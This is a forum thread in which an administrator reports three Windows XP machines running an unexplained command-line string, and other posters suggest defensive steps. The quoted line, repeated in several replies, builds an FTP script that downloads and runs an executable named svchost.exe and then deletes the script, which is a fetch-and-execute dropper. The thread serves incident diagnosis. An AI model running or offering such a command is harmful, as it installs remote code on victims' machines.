Virus Activity?

  • Thread starter Thread starter ctowndu33
  • Start date Start date
C

ctowndu33

We had three users (all with XP SP2) that all of a sudden this morning had
their task manager open up along with a command prompt. In the command
prompt, a statement was input along the lines of the following....

cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password >> o
&echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o
&svchost.exe


Anyone seen anything like this before? We haven't approved any Windows
Updates or anything like that (even though I wouldn't think that would have
anything to do with this). That is not a typo (above in the statement where
it says mircosoft password). Any help would be appreciated. We saw three at
the exact same time and then haven't seen anymore (we have about 100 Windows
XP SP2 machines).

Thanks in advance,
ctowndu33
 
ctowndu33 <ctowndu33@discussions.microsoft.com> wrote:
> We had three users (all with XP SP2) that all of a sudden this
> morning had their task manager open up along with a command prompt.
> In the command prompt, a statement was input along the lines of the
> following....
>
> cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password
> >> o &echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F
> /Q o &svchost.exe
>
>
> Anyone seen anything like this before? We haven't approved any
> Windows Updates or anything like that (even though I wouldn't think
> that would have anything to do with this). That is not a typo (above
> in the statement where it says mircosoft password). Any help would
> be appreciated. We saw three at the exact same time and then haven't
> seen anymore (we have about 100 Windows XP SP2 machines).
>
> Thanks in advance,
> ctowndu33

What antivirus software do you use? What firewall protects your network? Is
the Windows firewall enabled on these machines? I would disconnect them from
the network immediately while you do some checking, although if your other
machines aren't sufficiently protected you may have other creepy crawlies on
the network.
 
Looks suspicious. There are viruses that infect svchost.exe. Not sure what to
make of the commands though. "open" is not a Windows application or command and
"ms.microsoft.com" is registered to Microsoft. Of course they could have that
go anywhere if your hosts file was hacked.

"ctowndu33" <ctowndu33@discussions.microsoft.com> wrote in message
news:600CC05B-F956-46D5-9249-4359BF2F8766@microsoft.com...
> We had three users (all with XP SP2) that all of a sudden this morning had
> their task manager open up along with a command prompt. In the command
> prompt, a statement was input along the lines of the following....
>
> cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password >> o
> &echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o
> &svchost.exe
>
>
> Anyone seen anything like this before? We haven't approved any Windows
> Updates or anything like that (even though I wouldn't think that would have
> anything to do with this). That is not a typo (above in the statement where
> it says mircosoft password). Any help would be appreciated. We saw three at
> the exact same time and then haven't seen anymore (we have about 100 Windows
> XP SP2 machines).
>
> Thanks in advance,
> ctowndu33
 
We for the most part are uptodate on Windows Updates. We are also uptodate
on our Symantec CE for the desktops (not my personal choice but everyone has
current definitions). We have a PIX in place, but our Windows Firewalls are
turned off. Since my post, I was told from one of our users that their
cursor moved. Now, the guy here before me deployed VNC through his image to
all the PCs. Since then, I have created a new image without VNC and in the
last 6 months, we have replaced about 1/2 of the computers. This was a great
excuse to go out and remove the rest of the installs. I can't imagine though
anyone that previously worked here connecting and trying to execute that
command.

"Lanwench [MVP - Exchange]" wrote:

> ctowndu33 <ctowndu33@discussions.microsoft.com> wrote:
> > We had three users (all with XP SP2) that all of a sudden this
> > morning had their task manager open up along with a command prompt.
> > In the command prompt, a statement was input along the lines of the
> > following....
> >
> > cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password
> > >> o &echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F
> > /Q o &svchost.exe
> >
> >
> > Anyone seen anything like this before? We haven't approved any
> > Windows Updates or anything like that (even though I wouldn't think
> > that would have anything to do with this). That is not a typo (above
> > in the statement where it says mircosoft password). Any help would
> > be appreciated. We saw three at the exact same time and then haven't
> > seen anymore (we have about 100 Windows XP SP2 machines).
> >
> > Thanks in advance,
> > ctowndu33
>
> What antivirus software do you use? What firewall protects your network? Is
> the Windows firewall enabled on these machines? I would disconnect them from
> the network immediately while you do some checking, although if your other
> machines aren't sufficiently protected you may have other creepy crawlies on
> the network.
>
>
>
 
fdisk and format and reinstall



"ctowndu33" <ctowndu33@discussions.microsoft.com> wrote in message
news:600CC05B-F956-46D5-9249-4359BF2F8766@microsoft.com...
> We had three users (all with XP SP2) that all of a sudden this morning had
> their task manager open up along with a command prompt. In the command
> prompt, a statement was input along the lines of the following....
>
> cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password >> o
> &echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o
> &svchost.exe
>
>
> Anyone seen anything like this before? We haven't approved any Windows
> Updates or anything like that (even though I wouldn't think that would
have
> anything to do with this). That is not a typo (above in the statement
where
> it says mircosoft password). Any help would be appreciated. We saw three
at
> the exact same time and then haven't seen anymore (we have about 100
Windows
> XP SP2 machines).
>
> Thanks in advance,
> ctowndu33
 
ctowndu33 <ctowndu33@discussions.microsoft.com> wrote:
> We for the most part are uptodate on Windows Updates. We are also
> uptodate on our Symantec CE for the desktops (not my personal choice
> but everyone has current definitions).

Have you forced a full scan?
What about anti-malware/adware/spyware?

> We have a PIX in place, but
> our Windows Firewalls are turned off.

I'd change that (use group policy to manage it, as I expect you have AD).
You can set up exceptions as needed. Also, on your PIX, I'd deny all
outbound Internet access from the LAN IP range used by your workstations
except TCP 80 and 443, for starters - and remove your end users from the
local administrators groups.

> Since my post, I was told from
> one of our users that their cursor moved. Now, the guy here before
> me deployed VNC through his image to all the PCs. Since then, I have
> created a new image without VNC and in the last 6 months, we have
> replaced about 1/2 of the computers. This was a great excuse to go
> out and remove the rest of the installs. I can't imagine though
> anyone that previously worked here connecting and trying to execute
> that command.

Is VNC traffic even allowed inbound through your Pix? Close it, if so. What
exactly is open?

What you saw looks highly suspicious to me. Someone or something is trying
to run a telnet session for some reason. I can't find anything useful in
google, but you might post in microsoft.public.security for more expert
help.





>
> "Lanwench [MVP - Exchange]" wrote:
>
>> ctowndu33 <ctowndu33@discussions.microsoft.com> wrote:
>>> We had three users (all with XP SP2) that all of a sudden this
>>> morning had their task manager open up along with a command prompt.
>>> In the command prompt, a statement was input along the lines of the
>>> following....
>>>
>>> cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft
>>> password
>>>>> o &echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F
>>> /Q o &svchost.exe
>>>
>>>
>>> Anyone seen anything like this before? We haven't approved any
>>> Windows Updates or anything like that (even though I wouldn't think
>>> that would have anything to do with this). That is not a typo
>>> (above in the statement where it says mircosoft password). Any
>>> help would be appreciated. We saw three at the exact same time and
>>> then haven't seen anymore (we have about 100 Windows XP SP2
>>> machines).
>>>
>>> Thanks in advance,
>>> ctowndu33
>>
>> What antivirus software do you use? What firewall protects your
>> network? Is the Windows firewall enabled on these machines? I would
>> disconnect them from the network immediately while you do some
>> checking, although if your other machines aren't sufficiently
>> protected you may have other creepy crawlies on the network.
 
Lenny <here@there.com> wrote:
> fdisk and format and reinstall

That's pretty extreme!


>
>
>
> "ctowndu33" <ctowndu33@discussions.microsoft.com> wrote in message
> news:600CC05B-F956-46D5-9249-4359BF2F8766@microsoft.com...
>> We had three users (all with XP SP2) that all of a sudden this
>> morning had their task manager open up along with a command prompt.
>> In the command prompt, a statement was input along the lines of the
>> following....
>>
>> cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft
>> password >> o &echo get svchost.exe >> o &echo quit >> o &ftp -n
>> -s:o &del /F /Q o &svchost.exe
>>
>>
>> Anyone seen anything like this before? We haven't approved any
>> Windows Updates or anything like that (even though I wouldn't think
>> that would have anything to do with this). That is not a typo
>> (above in the statement where it says mircosoft password). Any help
>> would be appreciated. We saw three at the exact same time and then
>> haven't seen anymore (we have about 100 Windows XP SP2 machines).
>>
>> Thanks in advance,
>> ctowndu33
 
Back
Top